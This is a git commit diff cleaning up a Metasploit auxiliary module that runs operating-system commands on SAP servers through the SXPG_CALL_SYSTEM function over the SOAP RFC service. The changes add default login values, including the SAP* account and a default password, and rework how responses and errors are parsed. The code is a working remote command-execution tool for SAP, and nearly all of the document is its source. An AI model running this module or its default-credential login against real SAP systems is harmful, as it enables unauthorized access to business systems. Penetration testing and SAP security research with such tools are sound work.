cleanup for sap_soap_rfc_sxpg_call_system.rb

2012-11-20 11:54:21 +01:00 · 2012-11-20 11:54:21 +01:00 · 31ca077dd6
parent 308eee7c4f
commit 31ca077dd6
1 changed files with 35 additions and 28 deletions
--- a/modules/auxiliary/scanner/sap/sap_soap_rfc_sxpg_call_system.rb
+++ b/modules/auxiliary/scanner/sap/sap_soap_rfc_sxpg_call_system.rb
@ -28,21 +28,30 @@ class Metasploit4 < Msf::Auxiliary
 		super(
 			'Name' => 'SAP SOAP RFC SXPG_CALL_SYSTEM Command Exec',
 			'Description' => %q{
-				This module makes use of the SXPG_CALL_SYSTEM Remote Function Call (via SOAP)
-				to execute OS commands as configured in SM69.
+					This module makes use of the SXPG_CALL_SYSTEM Remote Function Call, through the
+				use of the /sap/bc/soap/rfc SOAP service to execute OS commands as configured in
+				the SM69 transaction.
 				},
-			'References' => [[ 'URL', 'http://labs.mwrinfosecurity.com/tools/2012/04/27/sap-metasploit-modules/' ]],
-			'Author' => [ 'Agnivesh Sathasivam','nmonkee' ],
-			'License' => BSD_LICENSE
-			)
+			'References' =>
+				[
+					[ 'URL', 'http://labs.mwrinfosecurity.com/tools/2012/04/27/sap-metasploit-modules/' ]
+				],
+			'Author' =>
+				[
+					'Agnivesh Sathasivam',
+					'nmonkee'
+				],
+			'License' => MSF_LICENSE
+		)
 		register_options(
 			[
-				OptString.new('CLIENT', [true, 'Client', nil]),
-				OptString.new('USERNAME', [true, 'Username', nil]),
-				OptString.new('PASSWORD', [true, 'Password', nil]),
-				OptString.new('CMD', [true, 'Command to be executed', nil]),
-				OptString.new('PARAM', [false, 'Additional parameters', nil]),
-				OptEnum.new('OS', [true, 'Target OS','ANYOS',['ANYOS', 'UNIX', 'Windows NT', 'AS/400', 'OS/400']])
+				Opt::RPORT(8000),
+				OptString.new('CLIENT', [true, 'SAP Client', '001']),
+				OptString.new('USERNAME', [true, 'Username', 'SAP*']),
+				OptString.new('PASSWORD', [true, 'Password', '06071992']),
+				OptString.new('CMD', [true, 'SM69 command to be executed', nil]),
+				OptString.new('PARAM', [false, 'Additional parameters for the SM69 command', nil]),
+				OptEnum.new('OS', [true, 'SM69 Target OS','ANYOS',['ANYOS', 'UNIX', 'Windows NT', 'AS/400', 'OS/400']])
 			], self.class)
 	end

@ -82,8 +91,13 @@ class Metasploit4 < Msf::Auxiliary
 				# to do - implement error handlers for each status code, 404, 301, etc.
 				print_error("[SAP] #{ip}:#{rport} - something went wrong!")
 				return
-			else
-				success = true
+			elsif res and res.body =~ /faultstring/
+				error = res.body.scan(%r{<faultstring>(.*?)</faultstring>})
+				0.upto(error.length-1) do |i|
+					print_error("[SAP] #{ip}:#{rport} - error #{error[i]}")
+				end
+				return
+			elsif res
 				print_status("[SAP] #{ip}:#{rport} - got response")
 				saptbl = Msf::Ui::Console::Table.new(
 					Msf::Ui::Console::Table::Style::Default,
@ -93,26 +107,19 @@ class Metasploit4 < Msf::Auxiliary
 						'Indent' => 1,
 						'Columns' =>["Output",]
 						)
-				response = res.body if res
-				if response =~ /faultstring/
-					error = response.scan(%r{<faultstring>(.*?)</faultstring>})
-					success = false
-				end
-				output = response.scan(%r{<MESSAGE>([^<]+)</MESSAGE>}).flatten
+				output = res.body.scan(%r{<MESSAGE>([^<]+)</MESSAGE>}).flatten
 				for i in 0..output.length-1
 					saptbl << [output[i]]
 				end
+				print(saptbl.to_s)
+			else
+				print_error("[SAP] #{ip}:#{rport} - Unknown error")
+				return
 			end
 		rescue ::Rex::ConnectionError
 			print_error("[SAP] #{ip}:#{rport} - Unable to connect")
-			return false
-		end
-		if success
-			print(saptbl.to_s)
-		elsif !success
-			0.upto(error.length-1) do |i|
-				print_error("[SAP] #{ip}:#{rport} - error #{error[i]}")
-			end
+			return
 		end
+
 	end
 end